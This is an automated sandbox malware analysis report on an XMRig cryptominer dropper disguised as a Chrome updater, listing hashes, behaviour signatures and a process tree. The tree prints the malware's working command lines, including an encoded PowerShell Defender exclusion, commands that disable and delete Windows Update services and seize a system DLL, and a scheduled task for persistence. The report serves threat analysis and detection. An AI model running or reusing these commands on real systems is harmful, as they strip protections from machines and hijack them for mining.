Analysis
-
max time kernel
89s -
max time network
73s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
18-05-2022 21:09
General
-
Target
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe
-
Size
4.1MB
-
MD5
c1fd183c8ef30db8e2be4ab51e42501f
-
SHA1
67a5ba161cafa7f0471f03968dd0f94cfb21aa1a
-
SHA256
003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
-
SHA512
8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 5 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 56 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 41 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Chrome\updater.exe"C:\Program Files\Chrome\updater.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "wknkxnouyh"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe fffmrxkhevshsdek0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB6PB4TwHRdp5kOUybEcdYHFAhdUtiJ4KO+eYtq99cAs745QzaReMwKP0mBN9oMgdGhbI95+lAZBArBG1zgJG5b4GWFxfPtcy6WibtQFHOO2LexogLgCFNuU5CfXb28u22O7RtF8L1LLcQ11YdQfCpDvwswZSKmpzevICegb9KLIb3BMZYsJxOjUu7n990KBMZSyacB1V6bp6H6KpdSvkmxbcR2MioAEmbhhvA0Uadya6OEWZ3XLzaEiN12Iih4TE1mSJoZzt/auX1Ah8NcTZE/cyzd6u6Ke9xMHhy3B6Do54G9zHxCyzsFTagYSi2oNtHSwUHyLAZuA1VH0i89Htg+I+1qNuZcSQa52vl/B1NwmuGJ8bSYQ1Y84EKkpWNeAYba5l4yK+VXH9FKP0fJCGCyHnsBdn/mdlNErmLlJMZU68eyziKpgrg+yoyvbBkxzCN9LsvaewiEOrRVZ+MaTIxwc7gja3bR6jqBMbKRYvC72G3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Chrome\updater.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Program Files\Chrome\updater.exeFilesize
4.1MB
MD5c1fd183c8ef30db8e2be4ab51e42501f
SHA167a5ba161cafa7f0471f03968dd0f94cfb21aa1a
SHA256003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
SHA5128b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/356-364-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/356-370-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/356-365-0x0000000000401BEA-mapping.dmp
-
memory/976-373-0x00000205AC870000-0x00000205AC882000-memory.dmpFilesize
72KB
-
memory/976-360-0x00000205AC700000-0x00000205AC706000-memory.dmpFilesize
24KB
-
memory/1260-169-0x0000000000000000-mapping.dmp
-
memory/1580-385-0x0000000000000000-mapping.dmp
-
memory/1580-175-0x0000000000000000-mapping.dmp
-
memory/1716-182-0x0000000000000000-mapping.dmp
-
memory/1840-262-0x00000240EC860000-0x00000240EC86A000-memory.dmpFilesize
40KB
-
memory/1840-223-0x00000240EC840000-0x00000240EC85C000-memory.dmpFilesize
112KB
-
memory/1840-208-0x0000000000000000-mapping.dmp
-
memory/1840-229-0x00000240ECEC0000-0x00000240ECF79000-memory.dmpFilesize
740KB
-
memory/2032-170-0x0000000000000000-mapping.dmp
-
memory/2084-191-0x0000000000000000-mapping.dmp
-
memory/2132-121-0x0000020831630000-0x0000020831A4A000-memory.dmpFilesize
4.1MB
-
memory/2132-129-0x0000020816540000-0x000002081695B000-memory.dmpFilesize
4.1MB
-
memory/2168-359-0x0000000000000000-mapping.dmp
-
memory/2240-379-0x0000000000000000-mapping.dmp
-
memory/2376-353-0x0000000000000000-mapping.dmp
-
memory/2688-128-0x0000000000000000-mapping.dmp
-
memory/2700-375-0x0000000000000000-mapping.dmp
-
memory/2796-171-0x0000000000000000-mapping.dmp
-
memory/2948-172-0x0000000000000000-mapping.dmp
-
memory/2948-382-0x0000000000000000-mapping.dmp
-
memory/2952-380-0x0000000000000000-mapping.dmp
-
memory/3032-190-0x0000000000000000-mapping.dmp
-
memory/3192-192-0x0000000000000000-mapping.dmp
-
memory/3468-401-0x000001F573310000-0x000001F573316000-memory.dmpFilesize
24KB
-
memory/3468-178-0x0000000000000000-mapping.dmp
-
memory/3468-404-0x000001F572BF0000-0x000001F572BF7000-memory.dmpFilesize
28KB
-
memory/3496-130-0x0000000000000000-mapping.dmp
-
memory/3496-135-0x00000205FB9B0000-0x00000205FB9D2000-memory.dmpFilesize
136KB
-
memory/3496-138-0x00000205FBB60000-0x00000205FBBD6000-memory.dmpFilesize
472KB
-
memory/3520-179-0x0000000000000000-mapping.dmp
-
memory/3780-189-0x0000000000000000-mapping.dmp
-
memory/3784-188-0x0000000000000000-mapping.dmp
-
memory/3808-366-0x0000000000000000-mapping.dmp
-
memory/3912-186-0x0000000000000000-mapping.dmp
-
memory/3944-185-0x0000000000000000-mapping.dmp
-
memory/4100-177-0x0000000000000000-mapping.dmp
-
memory/4132-181-0x0000000000000000-mapping.dmp
-
memory/4148-207-0x0000000000000000-mapping.dmp
-
memory/4160-355-0x0000000000000000-mapping.dmp
-
memory/4224-187-0x0000000000000000-mapping.dmp
-
memory/4280-194-0x0000000000000000-mapping.dmp
-
memory/4372-358-0x0000000000000000-mapping.dmp
-
memory/4400-357-0x0000000000000000-mapping.dmp
-
memory/4412-356-0x0000000000000000-mapping.dmp
-
memory/4532-354-0x0000000000000000-mapping.dmp
-
memory/4556-363-0x0000000000000000-mapping.dmp
-
memory/4584-371-0x0000000000000000-mapping.dmp
-
memory/4592-361-0x0000000000000000-mapping.dmp
-
memory/4600-362-0x0000000000000000-mapping.dmp
-
memory/4608-184-0x0000000000000000-mapping.dmp
-
memory/4628-183-0x0000000000000000-mapping.dmp
-
memory/4848-180-0x0000000000000000-mapping.dmp
-
memory/4864-378-0x0000000000000000-mapping.dmp
-
memory/4864-168-0x0000000000000000-mapping.dmp
-
memory/4896-372-0x0000000000000000-mapping.dmp
-
memory/4928-381-0x0000000000000000-mapping.dmp
-
memory/4944-376-0x0000000000000000-mapping.dmp
-
memory/4948-166-0x0000000000000000-mapping.dmp
-
memory/4960-173-0x0000000000000000-mapping.dmp
-
memory/4960-383-0x0000000000000000-mapping.dmp
-
memory/4988-384-0x0000000000000000-mapping.dmp
-
memory/4988-174-0x0000000000000000-mapping.dmp
-
memory/5020-377-0x0000000000000000-mapping.dmp
-
memory/5028-167-0x0000000000000000-mapping.dmp
-
memory/5112-176-0x0000000000000000-mapping.dmp
-
memory/5116-390-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-391-0x0000000000410000-0x0000000000430000-memory.dmpFilesize
128KB
-
memory/5116-392-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-395-0x0000000000000000-0x0000000001000000-memory.dmpFilesize
16.0MB
-
memory/5116-389-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-386-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/5116-387-0x000000014036DB84-mapping.dmp